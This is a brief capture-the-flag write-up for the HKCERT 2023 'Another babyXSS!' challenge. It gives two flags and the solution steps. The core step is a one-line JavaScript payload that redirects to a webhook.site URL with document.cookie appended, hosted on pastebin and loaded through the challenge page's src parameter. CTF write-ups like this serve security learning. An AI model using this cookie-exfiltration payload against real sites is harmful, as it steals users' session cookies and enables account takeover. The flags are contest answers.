Here is the writeup for Another babyXSS!

hkcert23{he110_aga1n_4nd_we1c0m3_t0_hkc3r7_c7f}

又有寶貝 XSS (100 pts) (with guide)

The official guide is here

Solution

  1. Craft an exploit.

    location='https://webhook.site/someWebHook/?cookie='+document.cookie => https://pastebin.com/xxxxxxxx

  2. Baby, now I am your trusted parent, give me your flag!

    http://babyxss-k7ltgk.hkcert23.pwnable.hk:28232/?src=https://pastebin.com/dl/xxxxxxxx

The flag is obtained at the webhook as hkcert23{pastebin_0r_trashbin}